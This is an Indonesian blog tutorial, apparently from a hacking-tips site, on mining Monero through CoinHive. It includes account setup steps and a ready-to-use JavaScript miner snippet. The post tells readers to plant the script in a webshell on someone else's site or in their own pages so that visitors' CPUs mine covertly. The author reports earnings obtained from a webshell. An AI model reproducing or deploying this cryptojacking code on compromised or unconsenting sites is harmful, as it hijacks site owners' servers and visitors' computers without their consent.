Minning Monero dari Website, Webshell dan Blog - Ryangueltoem

Ryangueltoem

Kumpulan Berbagai TUTORIAL yang ada di Internet.

Breaking

Post Top Ad

All Tutor Cyber

Tuesday, February 20, 2018

Minning Monero dari Website, Webshell dan Blog


Tag :  - Auto minning monero
       - Nambang monero melalui website atau blog
       - Nambang monero dari webshell
       - Nambang monero menggunakan Javascript

Pada saat ini admin mau ngepost artikel tentang cara nambang monero melalui website, blog, ataupun dari webshell.

NB : Blog All Tutor Cyber bersih dari script minning monero online, pengunjung bisa langsung check source code pada blog ini.

Apa itu Monero ?
Monero merupakan satuan unit baru mata uang cryptocurency dan merupakan sumber terbuka dari cryptocurency namun sedikit berbeda dari bitcoin. Monero diciptakan pada April 2014, yang berfokus pada skala pribadi dengan sistem desentralisasi.Penambangan monero dapat dilakukan lebih efisien melalui perangkat keras dengan spesifikasi x86, x86-64, ARM atau bahkan Consumer Grade GPU. Harga monero juga lumayan tinggi, pada saat artikel ini ditulis harga 1 monero adalah 319.96 USD atau setara 4,342.00 IDR.

Apa itu CoinHive ?
Coin Hive adalah website yang memberikan fasilitas untuk menambang monero lewat javascript, balance yang kita dapatkan dari menambang akan ditampung di sini sebelum di transfer ke wallet monero kita.
Javascript bisa ditaruh di shell yang udah ditanam dalam website atau website milik kalian sendiri, sehingga bisa memanfaatkan browser dan CPU orang yang mengunjungi website untuk ditambangkan XMR.
Tujuan dari coinhive pada dasarnya adalah untuk monetize website sebagai alternatif pengganti Ads. Akan tetapi bagi kalian yang tidak punya website, masih bisa juga melakukan mining dengan cara menyimpan file dengan format .html.

Baiklah langsung saja Tutorial cara menambangnya :

Pertama-tama kalian harus membuat wallet kalian disini https://mymonero.com/#/create-your-account. Pendaftarannya cukup mudah, kalian tinggal memasukkan Private Login Key ke dalam kotak Confirm your Private Login Key.

Kalian harus menyimpan secret key tersebut untuk melakukan login kembali ke wallet kalian. Setelah log in, kalian akan mendapat Address monero kalian.

Setelah akun adress monero kalian selesai dibuat, langkah kedua kalian mendaftar disini https://coinhive.com/account/signup. Kalian tinggal memasukkan alamat email kalian dan Password lalu centang kotak Verify me, lalu tekan Signup.



check email kalian lalu konfirmasi pendaftaran CoinHive. Kalian akan langsung dialihkan ke dashboard akun CoinHive kalian.
Di dalam dashboard kalian pilih menu Settings di bagian kanan atas, lalu pilih menu Sites & API Keys. pada Sites & API Keys kalian tekan Create A New Site, lalu kalian buat nama site kalian, bebas mau apa aja kalian buat namanya. lalu tekan CREATE SITE.


Setelah selesai membuat site. kalian akan mendapatkan Site Key (public) dan Secret Key (private).



Salin Site Key (Public) lalu masukkan kedalam code Javacscript berikut :
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('site_key_(public)', {throttle: 0.3});
// Only start on non-mobile devices and if not opted-out
// in the last 14400 seconds (4 hours):
if (!miner.isMobile() && !miner.didOptOut(14400)) {
miner.start();
}
</script>
Ganti tulisan yang berwarna merah dengan Site Key (Public) kalian. Lalu masukkan Script tersebut pada webshell atau website kalian.
Masukkan script tersebut diatas tag </head> atau dimana aja yang tidak akan menggangu script lain pada website. Setelah kalian tekan save, jika ada yang berkunjung ke website tersebut akan otomatis menambang monero dan masuk ke akun CoinHive kalian.


Gambar diatas adalah contoh script yang saya tanam pada webshell.

Jika tidak punya webshell atau website sendiri bagaimana ?
Kalian bisa menambang melalui PC kalian sendiri dengan menggunakan kode di bawah ini.
<script src="https://authedmine.com/lib/simple-ui.min.js" async></script>
<div class="coinhive-miner"
style="width: 256px; height: 310px"
data-key="site_key_(public)">
<em>Loading...</em>
</div>
Salin script diatas lalu ganti tulisan merah dengan site key (public) kalian, save dengan format .html lalu jalankan.


Pada gambar diatas adalah bukti hasil nambang online saya hanya menggunakan webshell saja.
Dan jangan takut, Admin tidak pernah menggunakan script minning pada blog All Tutor Cyber ini.


Sekianlah Postingan Dari All Tutor Cyber tentang "Cara Minning Monero dari Website, Webshell dan Blog" Semoga Bisa Bermanfaat!

Anda Sekarang Sedang Membaca Postingan "Cara Minning Monero dari Website, Webshell dan Blog" Dengan URL https://ryangueltoem.blogspot.com/2018/02/minning-monero-dari-website-webshell.html

Jika ada kesalahan pada penulisan dalam artikel ini atau masih binggung step by step pada artikel ini kalian boleh berkomentar di bawah artikel ini.
Postingan ini Hanya Untuk Pembelajaran, Jika Ada Content Yang Berbau Pentest, Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.


4 comments:

  1. cara widrawnya kek gimana?
    Atau itu sdh otomatis?

    ReplyDelete
  2. kalau menjalankannya tanpa menggunakan webshell atau website bisa ga?? menggunakan python atau bash shell misalnya??

    ReplyDelete